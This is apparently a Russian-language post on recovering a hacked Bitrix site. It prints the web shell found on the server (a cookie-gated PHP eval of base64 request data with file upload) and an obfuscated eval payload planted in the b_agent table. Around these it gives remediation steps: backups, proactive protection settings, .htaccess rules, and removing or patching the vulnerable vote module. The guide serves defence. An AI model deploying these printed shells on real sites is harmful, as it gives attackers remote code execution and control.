Взлом Битрикс - сайт взломали
Причем в файловом менеджере видно, что появились странные файлы, которые, если попытаться открыть в текстовом редакторе - они не открываются, во-первых, а если сохранить и закрыть содержимое их, то он показывает, что этого файла типа нет, прям такая надпись выходит, вот его содержимое:
<?=409723*20;if(md5($_COOKIE[d])=="17028f487cb2a84607646da3ad3878ec"){echo"ok";eval(base64_decode($_REQUEST[id]));if($_POST["up"]=="up"){@copy($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);}}?>
Что делать:
1. Запросить логи у хостера
2. Восстановить сайт из бэкапа
3. Сохранить нужную версию
Что происходит:
- проникают через какую-то бреш, говорят, что vote.php
Можно проделать следующее (так как есть встроенная защита у Bitrix):
1. Настройка - Проактивная защита - Сканер безопасности
покажет что может быть.
2. Мне показалась интересна эта настройка:
Настройка - Проактивная защита - Защита сессий
ее включить
Описание ее такое:
Большинство атак на веб-приложения ставят целью получить данные об авторизованной сессии пользователя. Включение защиты сессий делает похищение авторизованной сессии неэффективным.
В дополнение к стандартным инструментам защиты сессий, которые устанавливаются в настройках группы, механизм защиты сессий включает:
смену идентификатора сессии раз в несколько минут (в зависимости от настройки);
хранение данных сессий в таблице модуля.
Хранение данных сессий в таблице модуля позволяет избежать чтения этих данных через скрипты других виртуальных серверов, исключив ошибки конфигурирования виртуального хостинга, ошибки настройки прав доступа во временных каталогах и ряд других проблем настройки операционной среды. Кроме того, это разгружает файловую систему, перенося нагрузку на сервер базы данных.
Рекомендуется включить для высокого уровня.
3.
Настройка - Проактивная защита - Защита редиректов
ее включить
Защита с htaccess
1) Ограничение к самому файлу .htaccess из соображений безопасности, а также рекомендуем после настройки всех правил поставить на файл права доступа 444.
<Files .htaccess>
order allow,deny
deny from all
</Files>
2) Если правят определенный php файл, то можно это дело тоже заблочить:
<files config.php>
order allow,deny
deny from all
</files>
Где смотреть
посмотреть в базе данных
1) заходят они через таблицу b_agent
и меняют id 1
у нас было:
$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%'
//>w7u5ST<"IA.xY:8e
eval /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y
(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/) #T/N82kY'xApsEIx`?}`2_DB3;dm
) /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/
а там должно быть:
\Bitrix\Main\Analytics\CounterDataTable::submitData();
2) посмотрите таблицу b_user нет ли там новых логинов и паролей и смените свои логины и пароли
По модулям
1) удалите модуль опросов vote - если вы им не пользуетесь
в модуле нашли уязвимость (исправили в версии 21.0.100)
Удалить/отключить модуль vote в bitrix можно в административном разделе:
Настройки - Настройки продукта - Модули (/bitrix/admin/module_admin.php?lang=ru), там надо найти модуль "Опросы, голосования (vote)" и удалить его.
Если вы не пользовались этим модулем (скорее всего это так), то сохранять таблицы и почтовые шаблоны необязательно.
Где удалить файлы модуля: Контент - Структура сайта - Файлы и папки - bitrix - modules (/bitrix/admin/fileman_admin.php?lang=ru&path=%2Fbitrix%2Fmodules&site=s1), найдите папку vote и удалите. Или через файловые менеджеры
б) или вариант пропатчить этот модуль
//В файл /bitrix/tools/vote/uf.php перед required
// Добавляем:
$request = \Bitrix\Main\Context::getCurrent()->getRequest();
if ( $request ->isPost()) {
CHTTP::SetStatus( "404 Not Found" );
@define( "ERROR_404" , "Y" );
die ();
}
//В файл /bitrix/tools/html_editor_action.php перед required
// Добавляем:
$request = \Bitrix\Main\Context::getCurrent()->getRequest();
if ( $request ->isPost()) {
CHTTP::SetStatus( "404 Not Found" );
@define( "ERROR_404" , "Y" );
die ();
}
